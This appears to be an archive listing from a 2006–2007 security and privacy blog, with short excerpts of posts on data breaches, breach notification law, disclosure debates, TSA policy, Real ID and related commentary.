TJX appears to have suffered little financial fallout. Its stock fell just 2 percent yesterday after the company disclosed the new problems, along with its fourth-quarter earnings. For the three months ended Jan. 27, TJX said, profit fell to $205 million from $288 million in the same period a year earlier. Store closings led TJX […]

 

Wretched Word of the Week: Trust

Where to start on this one? Trust as we use it means so many things. Then there’s the word trusted. Beyond that, there is trustworthy. A bullet point on a slide I recently saw said, “Trusted computing is not trustworthy computing.” Oh, how nice. Even better, “Trusted Computing does not mean trustworthy or secure.” I […]

 

Data Collection about Breaches

In “Once a data loss report, always a data loss report?” Dissent asks about what we should be collecting and analyzing. Scenario 1: “We thought we had lost a computer with sensitive customer records, but it turns out we didn’t lose it.” Should that entry in a breach list be removed? I think that the […]

 

Award-winning scrotum

The New York Times writes about “The Higher Power of Lucky“, a children’s book which recently won the Newbery Medal. As someone who has purchased his share of kids’ books, I assure you that the Newbery — and its companion the Caldecott Medal — signal quality to buyers. In this case, though, some parents and […]

 

Visualizing Breach Data

Using IBM’s cool “Many Eyes” service (now in alpha), I played for a few minutes with some breach data. Nothing more than the size of each entry in Attrition’s database, and its date. Looks kinda cool, I think.

 

DVD Player Advice?

I’d like to buy a cheap DVD player, and bet someone reading can tell me: Who’s the Apex of 2007? That is, who’s making cheap, consumer-friendly DVD players? I’d like one that’s: region-free; fully controllable (none of that “we’re sorry, you have to watch the ads” crap); good at error-correcting for scratched up DVDs.

 

Credentica Launches U-Prove

Montreal, QC (PRWEB) February 13, 2007 — Credentica , a Montreal-based provider of innovative security software for identity and access management, today announced the immediate availability of its U-Prove product for user-centric identity management. The U-Prove product enables organizations to protect identity-related information with unprecedented security throughout its lifecycle, wherever it may travel. It is […]

 

Ignite Seattle

I attended Ignite Seattle last night. It was awful. Don’t attend next time. No, just kidding. It was great, and very crowded. There were some really awesome talks. I’m inspired to put a talk together for next time. My favorites from last night were: Elisabeth Freeman gave a great talk on how the Head First […]

 

Department of pre-blogging, II

A bit of background. Sun recently got hit with a 0-day that was 13 years in the making, by seemingly repeating a coding worst practice that bit AIX back in 1994 — trusting environment variables under the control of an attacker. A slightly more complex variant bit Solaris’ telnetd in 1995. From the advisory (NSFW) […]

 

Party like it's 1994

A 0-day in Solaris {10,11} telnetd is reported. SANS has some details. Anyone who remembers the AIX “rlogin -froot” vuln will appreciate this one. (h/t to KK on this one)

 

Breach irony

According to Courtney Manzel, Counsel – Office of Privacy, Sprint Nextel Corporation, reporting a breach pursuant to NY’s notification law: A laptop computer was stolen from the human resources department of Velocita Wireless during a rash of office burglaries in the Woodbridge, New Jersey area. The laptop computer was one of many items stolen. It […]

 

Must-Read Article: The Ecstasy of Influence

This is in Harpers, “The Ecstasy of Influence.” It is an interesting meditation on the nature of art itself and how art is composed of other art. However, not only must you read this, you must read it all the way through to understand it and why it is important.

 

Coviello: RSA 2010 Will be Last Conference

Okay, that’s not precisely what he said. What he said was that in “two to three years” there will be no more “standalone security solutions.” Meanwhile, the tradeshow floor of the RSA conference seems to be enjoying something of a renaissance, which is good to know, as the theme of the conference is, well, The […]

 

If You Blow Hard, You Can Find a Disclosure Debate

So there’s a video of how to “Unlock A Car With a Tennis Ball.” I advise turning the sound off; there’s no value to a bad pseudo-rock soundtrack, and no information in it (all the narration is in text in the video). There’s also precious little information in the video. It’s not clear what make or […]

 

I Was Wrong

I’ve had a conversation recently with a CSO about breach disclosure. His shop had screwed up and exposed, well, an awful lot of social security numbers. They feel really bad about it, and they don’t think anyone will really be hurt. Gosh darn it, he was really sincere. So I take it back. We should […]

 

Defend Traditional Marriage In Washington

The Washington Defense of Marriage Alliance seeks to defend equal marriage in this state by challenging the Washington Supreme Court’s ruling on Andersen v. King County. This decision, given in July 2006, declared that a “legitimate state interest” allows the Legislature to limit marriage to those couples able to have and raise children together. Because […]

 

Dave Molnar, Call Matt Blaze

Dave Molnar has some good comments on ‘Stolen ID Search.’ He writes, starting with a quote from “ben:” “I can’t believe you are advocating typing your ssn or credit card into a mystery box.” That’s “ben”, commenting at TechCrunch on Stolen ID Search, a service from Trusted ID that will tell you if your social […]

 

Department of Pre-blogging

Make sure to check out the blog posts Bruce Schneier and a host of others will soon make regarding the paralyzing effect that silly Blinkenlights ads for Aqua Teen Hunger Force had in Boston. The coordinated response by all departments proves the system we have in place works. Boston Mayor Thomas Menino Behold the power […]

 

Is this idea feasible?

With all the reports of lost backup tapes, I wonder if it would be technically feasible to keep an eye on them using RFID tags. If a tape “tries to leave” a facility without having been pre-authorized, bells go off. If a tape can’t be found, there’s a record of where it was last detected […]

 

Secrecy is not Privacy

So, I’m really irked by headlines like “Microsoft’s ‘Secret’ Security Summit.” First, it wasn’t Microsoft’s summit. It was an ISOTF meeting that had public web pages. Microsoft provided conference facilities and lunch. I don’t think we even bought the beer. Second, it wasn’t a secret. It has web pages: “Internet Security Operations and Intelligence II […]

 

From the "A Child Shall Lead Them" Desk

Response #24 in a discussion on FlyerTalk: My 10-y.o. son, like many kids, believes that backpacks have to be overloaded to work. Recently, at LAX T-6 (shoe carnival central), the TSA removed 2 partially full water bottles from his backpack after x-ray screening. On the return flight, at JFK T-9, they found 2 more, both […]

 

I'm Glad I'm a Beta!

27B Stroke 6 tells us of a story. The domain SecLists.org was removed from the net by GoDaddy, its registrar. Why? Because MySpace complained. He’s got a mailing list archive and it has some stuff in it that pissed MySpace off — security information about phishing attacks. That’s well and good, but GoDaddy yanked the […]

 

When a 0% Success Rate is Worthwhile

There’s an article in Zaman.com, about “Turkish Hacker Depletes 10,000 Bank Accounts ” A criminal enterprise comprised of 10 individuals who drained the accounts of 10,580 customers by sending virus-infected e-mails was busted in Istanbul. … The suspects reportedly sent virus-infected emails to 3,450,000 addresses, and subsequently drained 10,850 bank accounts. That’s a hit rate […]

 

Old-Fashioned Values

This is probably the most important minute of video you’ll see this week, but on a better week, it won’t be. Thanks to manfromlaramie for finding this.

 

Funniest Spam of the Week

Hmmm, what to do, what to do? This is so funny on so many levels. How can you not like a phishing attack where the hook is a poll based on eBay being closed because of so many phishing attacks? January 19, 2007 Dear eBay Community: We have decided to close eBay on 27 February […]

 

Two Quickies on Credit

“The spread of the credit check as civil rights issue,” in the Christian Science Monitor: Bailey, with her lawyer, has lodged a complaint against Harvard charging racial discrimination. The reason: Studies show that minorities are more likely to have bad credit, but credit problems have not been shown to negatively affect job performance. and “Insurers […]

 

Everything Old is New Again

“They are a handful of miserable resuscitators of a degenerate dead religion who wish to return to the monstrous dark delusions of the past,” said Father Efstathios Kollas, the President of Greek Clergymen. Hundreds of followers of Zeus, Hera, Poseidon, Artemis, Aphrodite and Hermes stood in a circle, a mile from the Acropolis, in what […]

 

A compromising position

Does Pete Lindstrom need to buy a dictionary? You make the call. In a recent post at Spire Security Viewpoint, he suggests that the folks at Privacyrights.org might be liars: I am starting to see (and hear) this “100 million records lost since February, 2005” figure referenced in a number of places such that it […]

 

It's Amazing What A Little Oversight Can Do

Two in the Washington Post today: “Secret [FISA] Court to Govern Warrantless Taps” and “Vast Data Collection Plan Faces Big Delay:” In a report to Congress to be released today, the Treasury Department concluded that the program was technologically feasible and has value, but said it needs to determine whether the counterterrorism benefit outweighs banks’ […]

 

"Not Having a Discussion About What I'm Buying? Priceless."

There’s a fascinating article in Sunday’s New York Times, “Money Doesn’t Talk.” The money quote: Through her store, Pesca, Ms. Azizian has earned her financial independence, but to avoid the disapproval of her husband of 27 years, she adopts a low profile by using cash. “His tastes aren’t as expensive as mine, and he doesn’t […]

 

Security Through Obscurity, The Next Big Thing

PCMesh, a Canadian company, has something Better Than Encryption. Encrypted files are still visible on the hard drive. This makes them vulnerable to attack from anyone who is interested enough in the content of the files to spend time trying to decipher them. And with more and more hackers intent on defeating modern encryption algorithms, […]

 

New Year's Resolution Dept. — Protecting Against Identity Theft

It’s the MLK Day holiday weekend. That means that one’s headache has subsided to the point that one can no longer hear one’s nose hair growing, and the cat is padding rather than stomping. It also means that it’s time for New Year’s Resolutions! If yours is to get better control over your information privacy, […]

 

Report: Approaches to Security Breach Notification

The Canadian Internet Policy and Public Interest Clinic at the University of Ottawa has published a report entitled Approaches to Security Breach Notification [pdf]. From the Introduction: This White Paper considers the need for an explicit obligation in Canadian privacy law to notify affected individuals of a breach in an organization’s security that places those individuals’ […]

 

New York Times on DRM

“Want an iPhone? Beware the iHandcuffs” says The New York Times in today’s edition of “Your Money”. Unfortunately it doesn’t really say much about the iPhone and crippleware beyond saying that it will be limited in music playing in effectively the iPod. However the article does a very nice job of covering the state of […]

 

Going the extra mile

As a control against identity theft, firms operating on-line often send snail mail confirmations to their customers when such things as site passwords, beneficiaries, or customer addresses have been changed. This allows the customer to review such changes and catch any that may have been unauthorized. I was the recipient of two such pieces of […]

 

Credit Card Data Over AOL IM

From the files of “too good to make up”, DavidJ.org reports a story from a couple of years ago about his credit card data being sent over AOL Instant Messenger. Essentially he bought some merchandise at a shop which didn’t have a point of sale terminal, so the clerk was IMing all credit card data […]

 

Full Disclosure == Torture

Or so says the Mogull over at Securosis. This particular section sums up my own feelings about the necessity of full disclosure quite well. I think we need full disclosure as a tool in our arsenal, and that most of the researchers dropping these vulnerabilities think they’re doing good, but full disclosure needs to be […]

 

A Pleasure Doing Business With You!

The BBC reports that the United Kingdom’s 1945 war debt to US [is] ‘almost paid’ and [was] paid off at the end of last year: The final payment of £45m will be made by the 31 December, meeting a 1945 obligation to repay the debt in full. In unrelated news, I’m told that neither the […]

 

Bay Area Security Incident Exercise

For those who are located in the SF Bay Area (or will be there on February 21st), the Silicon Valley ISSA Chapter is hosting a one day mock security incident exercise. The goal of the exercise is to explore how different organizations and industries must work together to respond to events based on their organizational […]

 

FTC Accepting Comments on ID Theft

The President’s Identity Theft Task Force announced that it is seeking public comment on various possible recommendations to improve the effectiveness and efficiency of the federal government’s efforts to reduce identity theft. The Task Force is chaired by Attorney General Alberto R. Gonzales and co-chaired by Federal Trade Commission Chairman Deborah Platt Majoras and participants […]

 

Secret Laws, Obnoxious Laws … No Law's Not Looking So Bad

First, from 27B/6, we learn that “Supremes Won’t Hear Secret Law Challenge,” and that administrative agencies such as TSA are free to promulgate laws and regulations we can’t see or challenge. Second, via Kansas City Newzine, we learn about the totally screwed up set of rules which are ‘REAL ID,’ featuring this chilling quote: […]

 
 

Insuring Against Data Loss Losses

Matt Hines reports on a growing market for corporate insurance, responding to concerns about breach laws, in “Dark Day Planning: Insuring Against Data Loss:” As a result of the widening impact of data losses, AIG has seen its business of providing insurance for potential corporate security failures shift increasingly toward protection for privacy-related risks. Another […]

 

A Request

My latest request for documents under New York State’s freedom of information law was just responded to. There are 1289 pages of documents covering the period 6/2006 to 12/2006. By way of comparison, my two previous requests covered the period 12/2005 to 5/2006, and yielded 400 pages or so. The nice folks in NY made […]

 

Hmmm…Breach Notification…Australia…

So there’s an article in ZDNet Australia, “Establish a strategy for security breach notification.” All well and good, but Australia doesn’t have a breach notice law. (As far as I know.) So all you ‘new normal’ skeptics, who don’t believe me that standards are changing ahead of laws…why did a competent journalist writing for editor […]

 

Five Things You Don't Know About Me

Dear Bob, You may think I’ve been ignoring your post, but I’ve been trying to decide how to approach it. This morning, courtesy of Scoble, I found Hugh McLead’s post on the subject: I dislike you intensely. I love it when bad things happen to you. When your name is mentioned I immediately try to […]

 

I knew those Bratz were trouble

As if Barbie isn’t a bad enough role model, it seems that at least one Bratz doll came complete with actual marijuana as an after-market accessory. The unlucky recipient’s mom quickly called 911 when she found the contraband packaged with the doll she received in the mail, having thought it was an identical doll she […]

 
 

Trusting Privacy Promises

Michael Arrington writes at Techcrunch about a former law firm, all of whose records are going to be opened to the public: Brobeck, Pleger & Harrison LLP was a well known law firm in silicon valley during the first Internet boom. They had thousands of startup and public company clients and handled all aspects of […]

 

Would You Do Me A Favor?

Nick Owen posts his favorite blog posts of the year. I have my favorites, but I’m curious. What are yours? What do you remember? We’d love to know.

 
 
 

DHS says one thing, does another. Film at 11.

The Department of Homeland Security (DHS) Privacy Office conducted a review of the Transportation Security Administration’s (TSA) collection and use of commercial data during initial testing for the Secure Flight program that occurred in the fall 2004 through spring 2005. The Privacy Office review was undertaken following notice by the TSA Privacy Officer of preliminary […]

 

Radical Transparency and Society

In “Radical Transparency to improve resilience,” John Robb posts about Chris Anderson’s ‘radical transparency:’ Think about how these tactics can be applied to societal resilience: Show who we are. Show what we are working on. “Process as Content.” Privilege the crowd. Let readers decide what is best (aka: wisdom of the crowd) Wikify (this another […]

 

That wasn't so bad after all…

There’s an article in Wall Street and Technology, “When Risk Managers Cry Wolf.” It opens: Avoiding “reputation risk” is a common justification for increasing security measures, protecting customers’ financial information and reporting security breaches in a timely manner. But now more than 18 months after the big ChoicePoint incident when 163,000 bogus accounts were created […]

 

Akaka-Sununu Bill Repeals Key Aspects Of The Real ID Act

Daniel Akaka and John Sununu have introduced a bill to repeal title II of the Real ID Act. From the press release: The Identification Security Enhancement Act (S. 4117) replaces REAL ID with language from the Intelligence Reform and Terrorism Prevention Act of 2004 (P.L. 108-458), which took a more measured approach in mandating tougher […]

 

Aspen Privacy Breach

The Wall Street Journal reported yesterday that “Stars Find Privacy Breached In Aspen by Phone Book” (behind paywall, sorry). According to the Journal: When the Yellow Book directory for Aspen, Colo. came out recently, residents of this ultra-chic ski town found it contained more than the usual list of local bars, hair salons and ski […]

 

Million Dollar Blog Post

My friend Austin Hill has put up the Million Dollar Blog Post. They, and their sponsors, will donate up to a million dollars to charity, at $1 per comment. I think charity is tremendously important. I’ve been lucky enough to have a set of skills that are well rewarded in today’s world. (I’m reminded of […]

 

Gifts for the Cryptological Mind

Cryptological in this case meaning those who like thinking about the hidden. Authorized Da Vinci Code Cryptex from The Noble Collection. It’s very nice, made of good, solid brass. It avoids many combination lock issues. I tried some obvious ways you can cheat a letter from such a device and it was well-made enough that […]

 

Breach Bills, and the Role of Encryption

In Grant Gross’s IDG article, “VA Security Breach Bill Criticized by Cybersecurity Group,” CyberSecurity Industry Alliance General Counsel Liz Gasster is quoted extensively: The Veterans Benefits, Health Care, and Information Technology Act, largely focused on veterans’ health-care programs, includes a section on information security requiring the VA to report data breaches of any “sensitive” personal […]

 

Infosec Incentives for People

So there’s been discussion here recently of how to motivate security professionals to do better on security. I think it’s also worthwhile to look at normal people. And conveniently, Bruce Schneier does so in his Wired column this month, “MySpace Passwords Aren’t So Dumb.” He looks at how MySpace users do in their passwords versus […]

 

One passport, please…

hold the RFID. I just got my US passport renewed, and I was pleasantly surprised when it came back Old Skool — no RFID. I’m happy…until 2016 anyway.

 

Introducing Mordaxus

Mordaxus is a longtime former cypherpunk with interests in anonymity, security and usability. He’s been involved in some of the biggest brands in security, and has entertaining stories about some of the most interesting events in information security history. He can’t tell those without giving away his secret identity, and so will focus on adding […]

 

Wikid cool thinking on Infosec incentives

First, assume that you believe, as discussed in Gordon & Loeb’s book Managing Cybersecurity Resources: A Cost-Benefit Analysis and discussed here that an organization should spend no more than 37% of their expected loss on information security. Second, assume that you agree with the Ponemon Institute on the cost of business data breaches: $182 per […]

 

Information Exposed For 800,000 At UCLA

Apparently it’s Identity Theft Tuesday here on Emergent Chaos. CNN reports that a “Hacker attack at UCLA affects 800,000 people”, which includes current and former faculty, students and staff. The initial break-in was apparently in October of 2005 and access continued to be available until November 21st of this year. I am stunned that it […]

 

Quotable quotes

History teaches you that dictators never end up well. Augusto Pinochet, November 25, 1915 – December 10, 2006

 

Medical Privacy

There’s a really interesting story in the New York Times last Sunday, “Health Hazard: Computers Spilling Your History.” Money quote: Some patients are so fearful that they make risky decisions about their health. One in eight respondents in a survey last fall by the California HealthCare Foundation said they had tried to hide a medical […]

 

So I’m Idly Curious…

“Please put your bra in the bin,” at Flyertalk: items used to augment the body for medical or cosmetic reasons such as mastectomy products, prosthetic breasts, bras or shells containing gels, saline solution, or other liquids; and, … 1. Separate these items from the liquids, gels, and aerosols in your quart-size and zip-top bag. 2. […]

 

Farts on a plane!

Or, “It’s not the crime, it’s the coverup”. It may be one problem airline security officials never envisioned — a passenger lighting matches in flight to mask odors from her flatulence. The woman’s actions resulted in an emergency landing on Monday in Nashville of an American Airlines flight bound for Dallas from Washington, D.C., said […]

 

Rocket Powered Mini

Can a rocket powered mini match the distance of an olympic ski jumper? Watch and see. For a full explanation of the results read Popular Science’s breakdown of the experiment.

 

Privacy For Hedge Funds

In “Citadel, Sensitive Data, and Plusfunds’ Bankruptcy” Paul Kedrosky looks at the impact of youthful chattiness on an industry: Apparently hedge fund Citadel is trying to purchase data from bankrupt Plusfunds that would detail trading strategies at some of its major competitors. The latter company had run a hedge fund index underlying which were trading […]

 

You Make Me Look Good. Thanks!

In “Our Tax Dollars at Work,” Phil writes: After half an hour I gave up on figuring out how to do my civic duty, and leveraged Adam for some help. He’s my go-to guy for this kind of thing. He has the kind of readership that provides answers in as little as forty earth minutes, […]

 

Security 1.27?

Security 2.0 indeed….. Thanks Illiad…. s/WEB/SECURITY/g Happy Saturday

 

Dear TSA, How Do We Contact Thee?

Phil Schwan, who was able to read to the end of “Homeland Security tracks travelers’ meals” without blowing a gasket, noticed that they said they’d only gotten 15 comments: I tried for 30 goddamn minutes to figure out how to comment. That’s why there are only 15 comments. All I could find was a Privacy […]

 

Radiation

How’d you like to be the person at British Airways who has to write the letter to 30,000 people explaining that they might have been exposed to a radioactive poison while traveling on BA flights? Remarkably, authorities will not confirm that the substance detected was Polonium, yet passengers on the flights are being asked to […]

 

More on Godin and Tufte

There’s another good article on Juice Analytics, “Godin, Tufte, and Types of Infographics:” (hey, guys, where are the author names? Author names only show in RSS, not the web page?) Tufte frustrates on a number of levels. He is enormously influential in business. Businesses send people to his seminars and they come back energized with […]

 

Fanning the flames, security metrics style

Amidst the to and fro over insider v. outsider threats, whether security metrics can be “gamed”, and so on, and in recognition of the best buddies that security geeks and economists have now become, I offer the following. The saying often quoted from Lord Kelvin (though the substance, I believe, is much older) that “where you […]

 

Small Bits of Chaos

Michael Giest is covering Canadian Parliamentary hearings over that country’s privacy law in “PIPEDA Hearings – Day 01 (Industry Canada)” “PIPEDA Hearings – Day 02 (B.C. Privacy Experts)” Bakelblog vents about the petty tyranny of immigration bureaucrats in “Welcome to America, Fuckwads!” Alec Muffet has interesting and detailed comments about the broken security of the […]

 

Banksy Again

Or how museum security is like information security. Or as Sivacracy put it “Involuntary Art Acquisitions”. Call it what you will, but in all cases it highlights the fact that most security programs be they physical or information focused, tend to be unidirectionally focused. In the case of museums, it is to ensure that nothing […]

 

Happy Geeky Thanksgiving

Hey everyone, it’s time to celebrate Thanksgiving here in the U.S. Or in the words of Anya, engage in “ritual sacrifice with pie.” If pie isn’t your thing, perhaps cookies are. kung-foodie points us to Joseph Hall’s Ubuntu and

 

England and Wales to fingerprint motorists at traffic stops

Via the Beeb: Drivers who get stopped by the police could have their fingerprints taken at the roadside, under a new plan to help officers check people’s identities. A hand-held device being tested by 10 forces in England and Wales is linked to a database of 6.5m prints. Police say they will save time because […]

 

Selling Security?

Last week, Martin McKeay responded to RaviC’s thoughtful discussion of security as a core competence by saying: I don’t think any business is going to buy into security as a core competence unless you can demonstrate to management that they’ve lost business directly because of a lack of security. And even then, it’s an incident […]

 

On Awareness

Last week, Rich Bejtlich posted his common security mistakes to TaoSecurity. His points are all excellent and well thought out, however, I would add one more item to his list: Awareness. It is very in vogue to say that user education must be eradicated, will never work and is one of the dumbest ideas in […]

 

Carole King said it best

“It’s too late, baby” Yeah, I’m dating myself, but Tapestry was huge, and she and Goffin had some serious songwriting chops. Anyway, the “it” about which it’s too late is, yes, a relationship. An important relationship. A relationship which, while admittedly not exclusive, is “open” in a hopefully honest, fulfilling, respectful way. That relationship is […]

 

SANS Top 20 has competition!

SANS has just released their annual Top 20. I won’t bother linking to it — Google knows where to find it, and if you’re reading this blog, you probably do too. Anyway, it seems like the SANS people have a bit of competition. Check out this list: Failing to assess adequately the vulnerability of its […]

 

Bag Matching and Lost Bags

Every now and then, it seems like TSA can do something right. I’ll let you know. In the meantime, the New York Times tells us that “Frustration Grows at Carousel as More Baggage Goes Astray:” The Transportation Department reported that 107,731 more fliers had their bags go missing in August than they did a year […]

 

Vulnerability Game Theory

So a few days ago, I attended the Vista RTM party. I spent time hanging out with some of the pen testers, and they were surprised that no one had dropped 0day on us yet. These folks did a great job, but we all know that software is never perfect, and that there are things […]

 

New Zealand to literacy: "l8r!"

Via CNN: WELLINGTON, New Zealand (AP) — New Zealand’s high school students will be able to use “text-speak” — the mobile phone text message language beloved of teenagers — in national exams this year, officials said. Text-speak, a second language for thousands of teens, uses abbreviated words and phrases such as “txt” for “text”, “lol” […]

 
 

Better Dead than Red?

Via the Beeb, writing about a county board election in South Dakota: Marie Steichen, who died of cancer in September, beat a Republican rival by 100 votes to 64 and became a county commissioner posthumously. The election list closed on 1 August, but Ms Steichen’s name was kept on the list for Tuesday’s election. Voters […]

 

Popping pills

Breach disclosure foes say that notifying those whose personal information may have been revealed in many breaches is costly, and often not commensurate with actual risk to consumers. A well-written example [pdf] can be had from the Political and Economic Research Council, which reports that direct notification costs are about $2.00 per notified person. So, […]

 

Mike Howard beats me to the punch

His posts on “Microsoft hosts OEM partners for a crash-course in SDL (Day Two)” and “Microsoft hosts OEM partners for a crash-course in SDL (Day Three)” cover much of what I wanted to say: My biggest observation was these guys were utterly engaged, and by that I mean writing copious notes and asking some very […]

 

Talking to OEMs

My co-worker Mike Howard posted “Microsoft hosts OEM partners for a crash-course in SDL (Day One)” As part of our ongoing SDL efforts, we are hosting a 2.5 day event here in Redmond for our OEM partners – over 50 senior technical experts from the biggest names in the computer industry. Out of respect for […]

 

Participatory Security

Cutaway, over at Security Ripcord provides us with an alternate take on the fact that security needs to understand the business constraints and goals of the organization. He (She?) quite rightly points out that security is a part of the “Service and Support” Group. He has two essential points: I have been hearing a lot […]

 

Topology Editors Resign En Masse

The New York Sun reports, “A Rebellion Erupts over Journals of Academia:” “Elsevier’s prices are very high,” said an emerita mathematics professor at Barnard College, Joan Birman, who resigned a few years ago from the board of an Elsevier journal, Topology and Its Applications. She said her feeling was, “We do the work, we check […]

 

Public Library of Science and The Journal System

Dave Weinstien has a really interesting article, “PLOS – Open Access science:” PLoS has an “intrinsic tension” [Hemai Parthasarathy] says because most of the people who started the journal don’t believe in elite publishing. “We think it’s wrong for tenure committees to pass the buck” to the editors of the top-tier journals. That’s why they’ve […]

 

How to Treat Customers

My friend Austin Hill has a new blog, Billions With Zero Knowledge. He’s got a really good post up “Crowdsourcing or Community Production – An Interview with Hugh McGuire from Librivox.” What’s most interesting to me is how new companies are trying to tap into customer enthusiasm to build not only value for their customers, […]

 

Happy Halloween

Sometimes it’s OK to take candy from strangers.

 

Giant Waves

Chandler Howell has a great post about giant waves. He quotes extensively from “Monster Rogue Waves” at Damninteresting: More recently, satellite photos and radar imagery have documented the existence of numerous rogue waves, and it turns out that they are far more common than previously thought. During a three-week study in 2001, radar scanning detected […]

 

On Printing Boarding Passes, Christopher Soghoian-style.

Yesterday, I blogged about Christopher Soghoian’s print your own boarding pass tool. Quite a few people (including the FBI) are taking the wrong lesson from this. Wrong lessons include “we shouldn’t be allowed to print boarding passes,” “we should check ID at the gate,” and “Christopher Soghoian should be arrested.” The right lesson is that […]

 

Risk Management Redux

Earlier this week, Mike Rothman took a swipe at Alex Hutton’s What Risk Management Isn’t by saying: But I can’t imagine how you get all of the “analysts and engineers to regularly/constantly consider likelihood and impact.” Personally, I want my firewall guy managing the firewall. As CSO, my job is to make sure that firewall […]

 

Congratulations to Counterpane and Bruce Schneier

Even though Chris got the news before me, I wanted to add my congratulations. I was involved in Counterpane very early, and made the choice to go to Zero-Knowledge Systems. I stayed involved on the technical advisory board, and was consistently impressed by the quality of the many Counterpane employees and executives who I met. […]

 

BT buys Counterpane

And so it continues…. Reuters has a few details. Unsurprisingly, Bruce Schneier also has a blog entry up on this.

 

Contactless Credit Cards Cracked

Well calling it cracked implies encryption or some semblance of security of which there is none according to the New York Times. In Researchers See Privacy Pitfalls in No-Swipe Credit Cards we learn that a team of folks from UMass Amherst and EMC/RSA tested a small batch of RFID Credit Cards from Amex, Visa and […]

 

Diebold goes open source

Well, not intentionally. Seems that multiple versions of source code (including the one used to run the 2004 primaries in Maryland) were delivered anonymously to a former legislator who has been critical of Diebold. Note that this is not the same source examined by Avi Rubin et al. and found wanting from a security perspective. […]

 
 

Radialpoint Needs People

My friends at Radialpoint are looking for a few great people to help drive their service delivery platform. They need a database development architect, a software architect, and a senior Java developer: These are leadership level positions in a growing company with great financial resources. Each of these team members will have the chance to […]

 

Threat Modeling: Uncover Security Design Flaws Using the STRIDE Approach

I’m pretty excited that an article, “Threat Modeling: Uncover Security Design Flaws Using the STRIDE Approach” is in the November MSDN magazine. The theme of the magazine is “Security Fundamentals.” The article that I wrote with Shawn Hernan, Scott Lambert, and Tomasz Ostwald talks about how we threat model our products at Microsoft. I’m happy […]

 

Analogies

So Chandler offers up “The Last Security Analogy You’ll Ever Need.” I’d like to pile on: Analogies are like fish. Sometimes they just don’t make sense.

 

Certification Shmertification

So it seems that certifications are again in the press. This time over at SC Magazine. Last month, SC ran “Does testing matter?”. I say ran as opposed to asked, because really the article was a page-long advertisement for the various certifications, with most of the quotes being from the various organizations who sponsor […]

 

Measurement

There are a bunch of ways to estimate how many people have died in the Iraq war. One is to keep track of news stories and official reports of combatant and civilian deaths, and add them up. Another is to employ the tools of epidemiology and demography. Until now, we’ve had essentially only the former […]

 

Real ID Will Waste $11 Billion

What could you do with $11 billion? How many ways could we make the world a better place with that money? I know! Let’s spend it on a national ID card! The $11 billion figure comes from the National Conference of State Legislatures, and doesn’t include wasted time by productive members of society. On the […]

 

New, Non-Obvious, and umm, Useful?

Orin Kerr has an interesting post over at Volokh Conspiracy, “Government Responds in United States v. Ziegler,” which contains this interesting bit: But that’s simply not how the Fourth Amendment works. The “reasonable expectation of privacy” test is actually a system of localized rules: the phrase is simply a label, and what it actually means […]

 

"Reservoirs of Data"

Danielle K. Citron has put a new paper on SSRN, “Reservoirs of Danger: The Evolution of Public and Private Law at the Dawn of the Information Age.” It is highly readable for the lay audience, and lays out (what I think is) a strong case for strict liability in personal data breaches. The abstract of […]

 

BOOM, there it is

If, as is being suggested, North Korea has tested a nuke, things will be getting mighty interesting. I don’t know what to make of it, frankly. Update, 2350 CDT: Looks increasingly like there was, indeed, a test.

 

No Expectation of Privacy

Here in the U.S., one of our Old Order Amish communities has recently suffered an infamous crime — the murder of several schoolchildren.  Interest in this case has been high.  Naturally, the public’s right to know has been ably served, as journalists took plenty of funeral photographs, despite the fact that the Amish, on strict […]

 

Information Warfare

As long as I have been lecturing on security I have used the “Threat Hierarchy” that lists threats in ascending order of seriousness. It goes like this: 1. Exploratory hacking 2. Vandalism 3. Hactivism 4. Cyber crime 5. Information Warfare It turns out that this hierarchy is also a predictive time line. Obviously we are […]

 

The Canadian Privacy Landscape

There’s a really interesting article at Blogging on the Identity Trail, “Bouquets and brickbats: the informational privacy of Canadians:” In the course of our investigations, I frequently found myself reflecting on two broader questions: first, I wondered how best law could protect the personal information of Canadians—and by extension the privacy of Canadian citizens—in the […]

 

RSS Feeds

Thanks for the emails. We’re aware of some problems with the RSS and comments feeds, and will be working through them asap. [Update: Should be fixed, as of Oct 05, 2006 at 05:01:36PM -0400. cw] [Update 2: When Chris said “fixed,” he was of course using the term in the sense of a Vegas prize […]

 

The Value of Location Privacy

There is a Workshop on Privacy in The Electronic Society taking place at the beginning of November. We (George Danezis, Marek Kumpost, Vashek Matyas, and [Dan Cvrcek]) will present there results of A Study on the value of Location Privacy we have conducted a half year back. We questioned a sample of over 1200 people […]

 

Less than zero-day

[This was prepared the morning of October 1, but not posted because I expected more to come of the story rather quickly. It now appears that 1. is true.] OK, so at Toorcon a couple of guys — one of whom works at SixApart — reported on a Firefox 0day. These gents claim to have […]

 

Marty: It's All About Transparency

Marty Roesch writes “Miracle Weapon in the War on Terror Discovered!.” You’d think he’d have more sympathy for the need for standardized transports while doing high-speed inspection.

 

2006 Underhanded C Contest

long unsigned int maxwordsize(char *inputFromStdIn) { long unsigned int tmpwordsize=0,maxword=1,i; for (i=0; i

 

Extra! Extra! Read Nothing About It! (Latest on Apple V. Maynor)

In “SecureWorks Backs Out of Macbook Demo,” Brian Krebs writes: David Maynor, the SecureWorks researcher who was set to demonstrate how wireless driver flaws could be used to compromise an Apple Mac laptop, suddenly has been yanked from the ranks of Toorcon presenters. At around 12:50 p.m. PT, SecureWorks issued the following press release: “SecureWorks […]

 

TRUSTing Mary Ann Davidson

Yesterday, Mary Ann Davidson had a fascinating post about the classics of Western literature. As usual for Mary Ann, the apparent basis of the post is really just exposition for her main point. In this case, the thrust of her post is the need for developers to have more training in secure coding at the […]

 

Words to live by

No free man shall be seized or imprisoned, or stripped of his rights or possessions, or outlawed or exiled, or deprived of his standing in any other way, nor will we proceed with force against him, or send others to do so, except by the lawful judgement of his equals or by the law of […]

 

Which Stupidity to Stop?

Stupid bills before legislatures seem to be a target rich environment, which is to say, it’s hard to even say where to start. So allow me to offer a suggestion: California’s SB768 will slow RFID stupidity. Take a look at EFF’s fact sheet, and then, if you’re in California, call your local Governator, and tell […]

 

Ed Felten's Testimony

Ed Felten, who has been doing research into security issues with Diebold’s voting machines, is testifying today at a House Administration Committee hearing. He’s posted his written testimony on his website. Check it out. [Edit: Corrected the spelling of Ed’s name.]

 

Breach Datasource Design Criteria

Most readers of these words are probably familiar with at least one of the lists of data breaches commonly referenced in the media and in specialized blogs. Among these are Attrition.org’s Dataloss, and Privacyrights.org’s Breach Chronology. The ID Theft Center also maintains a list (available, it seems, only as a PDF), and various academic researchers […]

 

Worse Than Choicepoint: The FTC?

